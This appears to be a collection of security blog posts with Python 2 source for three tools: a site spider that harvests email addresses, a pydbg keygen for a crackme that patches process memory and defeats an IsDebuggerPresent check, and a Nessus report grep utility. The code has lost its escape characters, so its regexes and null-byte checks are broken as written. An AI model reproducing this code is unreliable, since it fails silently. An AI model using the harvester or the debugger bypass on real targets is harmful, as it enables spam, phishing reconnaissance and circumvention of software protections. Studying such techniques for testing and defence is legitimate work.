This tool begins at a few root pages, which can be comma delimited. From these, it searches for all unique links by keeping track of a queue so that pages are not usually revisited (although revisiting a page is still possible in case the server is case insensitive or equivalent pages are dynamically generated with unique URLs). In addition, the base class is passed a website scope so that pages outside of that scope are not spidered. By default, the scope is simply a regular expression including the top domain name of the organization.

Each page requested searches the contents for the following regular expression to identify common email formats:

[w_.-]{3,}@[w_.-]{6,}

The 3 and 6 repeaters were necessary because of false positives otherwise obtained due to various encodings. This regular expression will not obtain all email addresses. However, it will obtain the most common addresses with a minimum of false positives. In addition, the obtained email addresses are run against a blacklist of uninteresting generic form addresses (such as help@example.com, info@example.com, or sales@example.com).

These email addresses are saved in memory and reported when the program completes or is interrupted. Note because of the dynamic nature of some pages, these can potentially spider infinitely and must be interrupted (for example, a calendar application that uses links to go back in time indefinitely). Most emails seemed to be obtained in the first 1,000 pages crawled. A limit of 10,000 pages was chosen as a reasonable scope. Although this limit was reached several times, the spider program uses a breadth search method. It was observed that most unique addresses were obtained early in the spidering process, and extending the number of pages tended to have a diminishing return. Despite this, websites with more pages also tended to correlate with greater email addresses returned (see analysis section).

Much of the logic in the spidering tool is dedicated to correctly parsing html. By their nature, web pages vary widely with links, with many sites using a mix of directory traversal, absolute URLs, and partial URLs. It is no surprise there are so many security vulnerabilities related to browsers parsing this complex data.
There is also an effort made to make the software somewhat more efficient by ignoring superfluous links to objects such as documents, executables, etc. Although if such a file is encountered an exception will catch the processing error, these files consume resources.

Using this tool is straightforward, but a certain familiarity is expected – it was not developed for an end user but for this specific experiment. For example, a URL is best processed in the format http://example.com/ since in its current state it would use example.com to verify that spidered addresses are within a reasonable scope. It prints debugging messages constantly because every site seemed to have unique parsing quirks. Although other formats and usages may work, there was little effort to make this software easy to use.

Here is the source.
#!/usr/bin/python

import HTMLParser
import urllib2
import re
import sys
import signal
import socket

socket.setdefaulttimeout(20)

#spider is meant for a single url
#proto can be http, https, or any
class PageSpider(HTMLParser.HTMLParser):
  def __init__(self, url, scope, searchList=[], emailList=[], errorDict={}):
    HTMLParser.HTMLParser.__init__(self)
    self.url = url
    self.scope = scope
    self.searchList = searchList
    self.emailList = emailList
    try:
      urlre = re.search(r"(w+):[/]+([^/]+).*", self.url)
      self.baseurl = urlre.group(2)
      self.proto = urlre.group(1)
    except AttributeError:
      raise Exception("URLFormat", "URL passed is invalid")
    if self.scope == None:
      self.scope = self.baseurl
    try:
      req = urllib2.urlopen(self.url)
      htmlstuff = req.read()
    except KeyboardInterrupt:
      raise
    except urllib2.HTTPError:
      #not able to fetch a url eg 404
      errorDict["link"] += 1
      print "Warning: link error"
      return
    except urllib2.URLError:
      errorDict["link"] += 1
      print "Warning: URLError"
      return
    except ValueError:
      errorDict["link"] += 1
      print "Warning link error"
      return
    except:
      print "Unknown Error", self.url
      errorDict["link"] += 1
      return
    emailre = re.compile(r"[w_.-]{3,}@[w_.-]{2,}.[w_.-]{2,}")
    nemail = re.findall(emailre, htmlstuff)
    for i in nemail:
      if i not in self.emailList:
        self.emailList.append(i)
    try:
      self.feed(htmlstuff)
    except HTMLParser.HTMLParseError:
      errorDict["parse"] += 1
      print "Warning: HTML Parse Error"
      pass
    except UnicodeDecodeError:
      errorDict["decoding"] += 1
      print "Warning: Unicode Decode Error"
      pass
  def handle_starttag(self, tag, attrs):
    if (tag == "a" or tag =="link") and attrs:
      #process the url formats, make sure the base is in scope
      for k, v in attrs:
        #check it's an htref and that it's within scope
        if  (k == "href" and
            ((("http" in v) and (re.search(self.scope, v))) or
            ("http" not in v)) and
            (not (v.endswith(".pdf") or v.endswith(".exe") or
             v.endswith(".doc") or v.endswith(".docx") or
             v.endswith(".jpg") or v.endswith(".jpeg") or
             v.endswith(".png") or v.endswith(".css") or
             v.endswith(".gif") or v.endswith(".GIF") or
             v.endswith(".mp3") or v.endswith(".mp4") or
             v.endswith(".mov") or v.endswith(".MOV") or
             v.endswith(".avi") or v.endswith(".flv") or
             v.endswith(".wmv") or v.endswith(".wav") or
             v.endswith(".ogg") or v.endswith(".odt") or
             v.endswith(".zip") or v.endswith(".gz") or
             v.endswith(".bz") or v.endswith(".tar") or
             v.endswith(".xls") or v.endswith(".xlsx") or
             v.endswith(".qt") or v.endswith(".divx") or
             v.endswith(".JPG") or v.endswith(".JPEG")))):
          #Also todo - modify regex so that >= 3 chars in front >= 7 chars in back
          url = self.urlProcess(v)
          #TODO 10000 is completely arbitrary
          if (url not in self.searchList) and (url != None) and len(self.searchList) < 10000:
            self.searchList.append(url)
  #returns complete url in the form http://stuff/bleh
  #as input handles (./url, http://stuff/bleh/url, //stuff/bleh/url)
  def urlProcess(self, link):
    link = link.strip()
    if "http" in link:
      return (link)
    elif link.startswith("//"):
      return self.proto + "://" + link[2:]
    elif link.startswith("/"):
      return self.proto + "://" + self.baseurl + link
    elif link.startswith("#"):
      return None
    elif ":" not in link and " " not in link:
      while link.startswith("../"):
        link = link[3:]
        #TODO [8:-1] is just a heuristic, but too many misses shouldn't be bad... maybe?
        if self.url.endswith("/") and ("/" in self.url[8:-1]):
          self.url = self.url[:self.url.rfind("/", 0, -1)] + "/"
      dir = self.url[:self.url.rfind("/")] + "/"
      return dir + link
    return None

class SiteSpider:
  def __init__(self, searchList, scope=None, verbocity=True, maxDepth=4):
    #TODO maxDepth logic
    #necessary to add to this list to avoid infinite loops
    self.searchList = searchList
    self.emailList = []
    self.errors = {"decoding":0, "link":0, "parse":0, "connection":0, "unknown":0}
    if scope == None:
      try:
        urlre = re.search(r"(w+):[/]+([^/]+).*", self.searchList[0])
        self.scope = urlre.group(2)
      except AttributeError:
        raise Exception("URLFormat", "URL passed is invalid")
    else:
      self.scope = scope
    index = 0
    threshhold = 0
    while 1:
      try:
        PageSpider(self.searchList[index], self.scope, self.searchList, self.emailList, self.errors)
        if verbocity:
          print self.searchList[index]
          print " Total Emails:", len(self.emailList)
          print " Pages Processed:", index
          print " Pages Found:", len(self.searchList)
        index += 1
      except IndexError:
        break
      except KeyboardInterrupt:
        break
      except:
        threshhold += 1
        print "Warning: unknown error"
        self.errors["unknown"] += 1
        if threshhold >= 40:
          break
        pass
    garbageEmails =   [ "help",
                        "webmaster",
                        "contact",
                        "sales" ]
    print "REPORT"
    print "----------"
    for email in self.emailList:
      if email not in garbageEmails:
        print email
    print "nTotal Emails:", len(self.emailList)
    print "Pages Processed:", index
    print "Errors:", self.errors

if __name__ == "__main__":
  SiteSpider(sys.argv[1].split(","))

pydbg reverseme solution

Last week I wrote a keygen here.

This is an almost identical problem, but the binary has been patched to allow debugging (I may do this programmaticly as well, but not yet). I wanted to solve this with programmatic debugging. Here is the exe:
Ice9pch3.

The code simply sets a breakpoint and prints the key to the screen. Also it patches the process memory so that the serial is valid.

import sys
import ctypes

from pydbg import *
from pydbg.defines import *


print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it to memory"
print "Basically, pydbg 'hello, world'"
print "-------------"

if len(sys.argv) != 2:
    print "Error. USAGE: keygen.py C:fullpathice"
    sys.exit(-1)

def handler_breakpoint(mdbg):
    valid_str = ""
    #the valid serial is at 004030C8
    addr = 0x004030C8
    while 1:
        tmp = mdbg.read(addr, 1)
        addr += 1
        if tmp != "x00":
            valid_str = valid_str + tmp
        else:
            break
    print "The valid string is: ", valid_str
    print "Writing this to memory..."
    #write this to memory at 004030b4
    #def write (self, address, data, length=0)
    wdata = ctypes.create_string_buffer(valid_str)
    mdbg.write(0x00403198, wdata, len(valid_str))
    #checking the write
    #print mdbg.read(0x00403198, len(valid_str) + 1)
    return DBG_CONTINUE

dbg = pydbg()
dbg.set_callback(EXCEPTION_BREAKPOINT, handler_breakpoint)
dbg.load(sys.argv[1])
dbg.debug_event_iteration()
#at 004011FF in execution, 
#def bp_set (self, address, description="", restore=True, handler=None):
dbg.bp_set(0x004011F5)
dbg.debug_event_loop()

Updated solution. I change a register now to circumvent the isdebuggerpresent call.

import sys
import ctypes

from pydbg import *
from pydbg.defines import *


print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it to memory"
print "Basically, pydbg 'hello, world'"
print "-------------"

if len(sys.argv) != 2:
    print "Error. USAGE: keygen.py C:fullpathice"
    sys.exit(-1)

def handler_breakpoint(mdbg):
    if mdbg.get_register("EIP") == 0x004011F5:
        valid_str = ""
        #the valid serial is at 004030C8
        addr = 0x004030C8
        while 1:
            tmp = mdbg.read(addr, 1)
            addr += 1
            if tmp != "x00":
                valid_str = valid_str + tmp
            else:
                break
        print "The valid string is: ", valid_str
        print "Writing this to memory..."
        #write this to memory at 004030b4
        #def write (self, address, data, length=0)
        #wdata = ctypes.create_string_buffer(valid_str)
        mdbg.write(0x00403198, valid_str, len(valid_str))
        #checking the write
        #print mdbg.read(0x00403198, len(valid_str) + 1)
    if mdbg.get_register("EIP") == 0x40106e:
        mdbg.set_register("EAX", 0)
    return DBG_CONTINUE

dbg = pydbg()
dbg.set_callback(EXCEPTION_BREAKPOINT, handler_breakpoint)
dbg.load(sys.argv[1])
dbg.debug_event_iteration()
#0x40106e is the point where we can circumvent the isdebugger present call
dbg.bp_set(0x40106e)
#at 004011FF in execution, 
#breakpoing for reading writing final compare
dbg.bp_set(0x004011F5)
dbg.debug_event_loop()

Nessus Grep

The code is pretty self explanatory. It searches through a .nessus file and spits out matching hosts.

#!/usr/bin/python

def usage():
  print """
This program takes a regular expression for a problem and returns the
affected hosts. It iterates through all reports saved in a .nessus file
making no attempt at uniqueness, (eg if you scanned a host more than once) 
searching through titles, data, port, and IDs for matches.

It prints one host per line, relying on tools like wc, tr, sort, uniq

USAGE:
arg[0] [--dns]  myfile.nessus regex

For a regex reference, see http://docs.python.org/library/re.html

The --dns flag will print out the dns name in addition to what was given for 
the scan

EXAMPLES:

#search for hosts that ran the nikto plugin
python nessus_grep.py scan.nessus nikto

#case insensitive search for nikto
python nessus_grep.py scan.nessus "(?i)nikto"

#it's usually probably ok to just check for id, but be careful
#as an added precaution I give it the beginning end of lines
python nessus_grep.py scan.nessus "^10386$" 

#find all hosts with either the SSL Cipher "bug" or running SSL Version 2
python nessus_grep.py scan.nessus "(SSL Weak Cipher Suites Supported|SSL 
Version 2 (v2) Protocol Detection)"
"""

import sys
import re
from lxml import etree

def regexsearch(regex, *strings):
  for i in strings:
    try:
      if re.search(regex, i):
        return True
    except TypeError:
      pass

"""
Although there is some repeating logic in dotnessusparse
and dotxmlparse, they are two different formats and are
kept separate in case of changes to only one
"""
def dotnessusparse(nessus_xml, hostprint=False):
  for report in nessus_xml.getroot():
    if "Report" in repr(report.tag):
      for host in report:
        if "ReportHost" in host.tag:
          hostname = (host.find("HostName").text)
          dnsname = host.find("dns_name").text.rstrip(".\n")
          if ("(unknown)" in dnsname):
            dnsname = ""
          reptitem = (host.findall("ReportItem"))
          for issue in reptitem:
            data = issue.find("data").text
            pluginname = issue.find("pluginName").text
            pluginid = issue.find("pluginID").text
            port = issue.find("port").text
            if regexsearch(regex, data, pluginname, pluginid, port):
              if hostprint:
                hostname = hostname + " (" + dnsname + ")"
              print hostname
              break

def dotxmlparse(nessus_xml, hostprint=False):
  for report in nessus_xml.getroot():
    if "Report" in repr(report.tag):
      for host in report:
        if "ReportHost" in host.tag:
          hostname = host.get("name")
          dnsname = ""
          hostprops = host.find("HostProperties").findall("tag")
          for prop in hostprops:
            if prop.get("name") == "host-fqdn":
              dnsname = prop.text
          reptitem = (host.findall("ReportItem"))
          for issue in reptitem:
            data = sol = syn = plugout = None
            if issue.find("description") is not None:
              data = issue.find("description").text
            if issue.find("solution") is not None:
              sol = issue.find("solution").text
            if issue.find("synopsis") is not None:
              syn = issue.find("synopsis").text
            if issue.find("plugin_output") is not None:
              plugout = issue.find("plugin_output").text
            pluginname = issue.get("pluginName")
            pluginId = issue.get("pluginID")
            if regexsearch(regex, sol, syn, plugout, pluginname, pluginId):
              if hostprint:
                hostname = hostname + " (" + dnsname + ")"
              print hostname
              break

if __name__ == "__main__":
  re.IGNORECASE
  if len(sys.argv) < 3:
    usage()
    sys.exit(0)
  filelist = sys.argv[1:-1]
  try:
    filelist.remove("--dns")
    hostprint = True
  except ValueError:
    hostprint = False
  regex = sys.argv[-1]
  for nessusfile in filelist:
    nessus_xml = etree.parse(nessusfile)
    if nessusfile.endswith(".nessus"):
      dotnessusparse(nessus_xml, hostprint)          
    if nessusfile.endswith(".xml"):
      dotxmlparse(nessus_xml, hostprint)